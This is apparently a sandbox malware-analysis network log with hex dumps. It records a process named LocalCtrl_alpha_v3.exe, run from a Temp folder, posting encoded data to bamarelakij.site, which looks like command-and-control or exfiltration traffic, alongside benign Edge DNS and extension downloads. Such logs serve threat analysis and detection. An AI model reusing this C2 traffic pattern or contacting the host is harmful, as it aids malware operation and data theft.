                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: 4a 0b 44 06 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 44 06 2e 1d 36 89 4c d4 03 83 2a 0c bd 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 bd 07 55 ed 59 27 df 27 6c 2d af 0d 0c 06 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd f9 0c 06 40 4c 62 5d 30 5d 15 7a ab f7 51 f1 8b 29 c1 31 2b 06 2f 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 2f 07 82 90 d9 be e1 59 ec b4 71 0e d2 07 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 0b d2 07 25 2b 64 08 46 e2 51 02 d9 0e 8c 0f 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 8c 0f c3 94 33 f7 a0 5d 06 fd f9 00 fa 09 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 fa 09 57 06 36 49 41 a7 98 95 c6 de de d6 d2 ca e6 5c e6 e2 d8 d2 e8 ca fa 04 d6 0d 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 31 d6 0d 38 3d 51 e2 58 f4 64 e8 90
                                                                                                                                                                                                                                                                          Data Ascii: JDlD.6L*lUY''l-l@Lb]0]zQ)1+/l/Yql%+dFQl3]lW6IA\l18=QXd
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: 15 04 d9 6c 08 d9 b8 36 05 57 06 36 49 41 a7 98 95 86 74 b8 a0 e4 de ce e4 c2 da 40 8c d2 d8 ca e6 40 50 f0 70 6c 52 b8 9a d2 c6 e4 de e6 de cc e8 b8 8a c8 ce ca b8 82 e0 e0 d8 d2 c6 c2 e8 d2 de dc b8 da e6 ca c8 ce ca 5c ca f0 ca 3e 06 03 08 15 00 1f 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 03 08 57 06 36 49 41 a7 98 95 ea ec dc c6 40 c4 ec c4 c2 b8 aa d8 e8 e4 c2 ac 9c 86 b8 ea d8 e8 e4 c2 ec dc c6 5c d2 dc d2 5d 09 8d 05 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 d8 8d 05 d6 9d b9 94 b4 50 8c 9e 32 0a f4 0e 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 b1 f4 0e 57 06 36 49 41 a7 98 95 e6 ca e8 e8 d2 dc ce e6 73 00 6b 0b 15 00 13 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 6b 0b 57 06 36 49 41 a7 98 95 e0 c2 e6 e6 ee de e4 c8 e6 5c ca dc c6 da c2 e6 e8 ca e4 e6 0a 8e 07
                                                                                                                                                                                                                                                                          Data Ascii: l6W6IAt@@PplR\>lW6IA@\]lP2lW6IAsklkW6IA\
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 b8 ef 01 bd a4 f0 7d 37 6e c5 77 a1 06 7b 02 11 00 04 00 08 1f 0f 17 15 04 c9 6c 04 c9 12 7b 02 d0 e9 8a dd b2 c1 4a d2 f5 0e 95 09 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd 31 95 09 15 b4 35 53 07 82 0f 28 ff 0f 06 ff bc f6 db 63 7c 0e c1 0c 15 00 11 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 c1 0c 57 06 36 49 41 a7 98 95 c6 d0 e4 de da d2 ea da be c4 e4 de ee e6 ca e4 e6 02 0c 3d 02 15 00 06 00 08 1f 0f 17 15 04 d9 6c 08 d9 f9 3d 02 57 06 36 49 41 a7 98 95 a6 ca e4 ec ca e4 4f 00 84 0a 15 00 2a 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 84 0a 57 06 36 49 41 a7 98 95 9e ea e8 d8 de de d6 ae d2 dc 82 e0 e0 86 d8 c2 e6 e6 d2 c6 b8 82 e0 e0 88 c2 e8 c2 b8 98 de c6 c2 d8 b8 9e ea e8 d8 de de d6 13 01 d3 08 11 00 04 00 08 1f 0f 17
                                                                                                                                                                                                                                                                          Data Ascii: l}7nw{l{Jl15S(c|lW6IA=l=W6IAO*lW6IA
                                                                                                                                                                                                                                                                          2025-01-09 13:55:26 UTC1369INData Raw: d9 6c 08 d9 b8 ca 08 57 06 36 49 41 a7 98 95 9a 82 9c 92 8c 8a a6 a8 54 e4 06 45 0c 15 00 14 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 45 0c 57 06 36 49 41 a7 98 95 a8 d0 ea dc c8 ca e4 c4 d2 e4 c8 b8 a0 e4 de cc d2 d8 ca e6 91 0a d0 05 15 00 08 00 08 1f 0f 17 15 04 dd 6c 08 dd b8 d0 05 6e b0 78 a2 ec 20 d7 a4 80 0b 4b 0e 57 54 03 ef 87 04 5c 0d 15 00 08 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 5c 0d 57 06 36 49 41 a7 98 95 82 d8 d8 40 9a c2 d2 d8 2c 03 61 09 15 00 05 00 08 1f 0f 17 15 04 d9 6c 08 d9 d8 61 09 57 06 36 49 41 a7 98 95 54 5c c8 c2 e8 4e 06 b7 0c 15 00 0b 00 08 1f 0f 17 15 04 d9 6c 08 d9 b8 b7 0c 57 06 36 49 41 a7 98 95 98 de c6 c2 d8 40 a6 e8 c2 e8 ca 64 0f eb 0c 15 00 0e 00 08 1f 0f 17 15 04 d9 6c 08 d9 10 eb 0c 57 06 36 49 41 a7 98 95 ce ca c6 d6 de
                                                                                                                                                                                                                                                                          Data Ascii: lW6IATElEW6IAlnx KWT\l\W6IA@,alaW6IAT\NlW6IA@dlW6IA


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          1192.168.2.849714104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:27 UTC385OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 53
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:55:27 UTC53OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 03 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          2025-01-09 13:55:28 UTC742INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:28 GMT
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qut%2FhY4FnM4ufXjayIyQ5ZAJ8QGruquqXJWvahInxZsa3KJ61HRqACrfY5GcZl7vRslHA7MzevB8HITiU07xACdy4WplJ9GBhBhVr0CHAMcER9Rr8hf8jamPQODu9zRmERsE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ecd308ecc330-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1632&min_rtt=1620&rtt_var=632&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1074&delivery_rate=1699650&cwnd=235&unsent_bytes=0&cid=ee01516d4c4ca965&ts=331&x=0"
                                                                                                                                                                                                                                                                          2025-01-09 13:55:28 UTC24INData Raw: 31 32 0d 0a 00 00 00 00 02 00 00 00 fe ff ff ff 00 00 00 00 91 90 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 12
                                                                                                                                                                                                                                                                          2025-01-09 13:55:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          2192.168.2.849726104.21.80.524436712C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:29 UTC386OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 208
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:55:29 UTC208OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 01 0f 00 00 00 95 00 00 00 61 a6 b6 09 08 00 00 00 47 36 dd 17 a6 c9 98 95 00 00 00 00 06 00 00 00 c2 4d 6d 12 00 00 00 00 25 81 21 00 00 00 00 c4 00 00 00 c2 4d 6d 12 00 00 00 00 a0 96 0c 0c 58 00 00 00 00 00 00 00 5a 00 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 96 0c 0e 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 a0 96 0a 0c 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii: aG6Mm%!MmXZZ
                                                                                                                                                                                                                                                                          2025-01-09 13:55:29 UTC768INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:29 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          pid: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I97jEp00xdeJLUK7PMUT7gYM%2BXRCwlrvQiRPs%2BsSp4IKOhSI%2FI7fxQFCLY6vmGcYr70zSK%2Bpa2k%2B9bzRlYhl3ut%2BilY6aVCJHkUv%2BY2oD1QNFhtfMElriMYSYwbN70wzNtwK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ecdc3e3c8c36-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1848&min_rtt=1838&rtt_var=711&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1230&delivery_rate=1516883&cwnd=166&unsent_bytes=0&cid=84fa1829da8f1d54&ts=310&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          3192.168.2.849831162.159.61.34435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:42 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed3138b08c3c-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 20 00 04 8e fa 50 43 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom PC)


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          4192.168.2.849830172.64.41.34435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:42 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed312c864271-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2025-01-09 13:55:42 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 f1 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          5192.168.2.849833162.159.61.34435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                          Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 128
                                                                                                                                                                                                                                                                          Accept: application/dns-message
                                                                                                                                                                                                                                                                          Accept-Language: *
                                                                                                                                                                                                                                                                          User-Agent: Chrome
                                                                                                                                                                                                                                                                          Accept-Encoding: identity
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:55:43 GMT
                                                                                                                                                                                                                                                                          Content-Type: application/dns-message
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                          Content-Length: 468
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ed345d507277-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 d1 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                          Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          6192.168.2.849834142.250.185.1614435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                          Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          X-GUploader-UploadID: AFiumC60FXRFlnBRBQi3LEUQz5M9VCEpErAbNS4XBkrIk4uwQb-qy4IaP1uysfsIwpme-vjK
                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                          Content-Length: 154477
                                                                                                                                                                                                                                                                          X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                          Server: UploadServer
                                                                                                                                                                                                                                                                          Date: Wed, 08 Jan 2025 15:58:13 GMT
                                                                                                                                                                                                                                                                          Expires: Thu, 08 Jan 2026 15:58:13 GMT
                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                          Age: 79050
                                                                                                                                                                                                                                                                          Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                          ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                          Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                          Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                          Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                          2025-01-09 13:55:43 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
